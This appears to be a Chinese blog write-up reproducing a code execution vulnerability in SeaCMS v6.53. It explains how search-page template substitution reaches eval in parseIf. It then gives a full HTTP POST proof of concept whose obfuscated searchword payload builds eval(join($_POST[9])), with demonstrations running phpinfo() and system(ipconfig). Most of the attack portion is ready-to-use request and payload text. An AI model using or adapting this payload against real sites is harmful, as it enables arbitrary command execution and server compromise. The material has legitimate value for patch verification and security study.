参考连接
freebuf上面的cms文章
http://www.freebuf.com/vuls/150042.html
漏洞原理
文章里说的很清楚echoSearchPage函数中的content变量传给了parself函数,跟踪代码,找到./include/main.class.php,可以看到parseIf函数会将content内容eval执行,造成命令执行。
image.png
searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();
通过POC可以看出,通过对参数进行了替换之后,content中已经包含了如下攻击payload:if:eval(join($_POST[9]))
跟踪代码,找到./include/main.class.php,可以看到parseIf函数会将content内容eval执行,造成命令执行
image.png
本地搭建环境测试
win7 64位虚拟机+phpstudy
网盘找对应源码
https://pan.baidu.com/s/1jHQBKFk
漏洞复现过程
下面是自己搭建的测试网站,建站上用的phpstudy没有任何问题
image.png
安装完成界面
http://127.0.0.1/seacms(v6.53)/upload/index.php
首页
http://127.0.0.1/seacms(v6.53)/upload/
网上提供的poc
POST /seacms(v6.53)/upload/search.php HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 208
Cache-Control: max-age=0
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://127.0.0.1/seacms(v6.53)/upload/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: BEEFHOOK=9BIcNvrOYJ3zap74fscXQTchPtgyOGlbcO0DyQhdo7jP6k3prnO82U6v9cOOCFh1Xl8HLO0Bl417ZGSN; bdshare_firstime=1516777076849; UM_distinctid=16127562db49-05b0f0ac5b7059-454c092b-cc7fe-16127562dba35b; CNZZDATA1234139=cnzz_eid%3D1799312719-1516783434-%26ntime%3D1516783434; a4207_times=1; PHPSESSID=80dadc311b51e7ae6d8e4e57ff626241
searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();
执行结果,可见写入的代码被执行
TIM图片20180307181058.png
进一步利用,可以执行系统命令。
searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=sy&9[]=stem(ipconfig);
image.png
可以成功利用
网友评论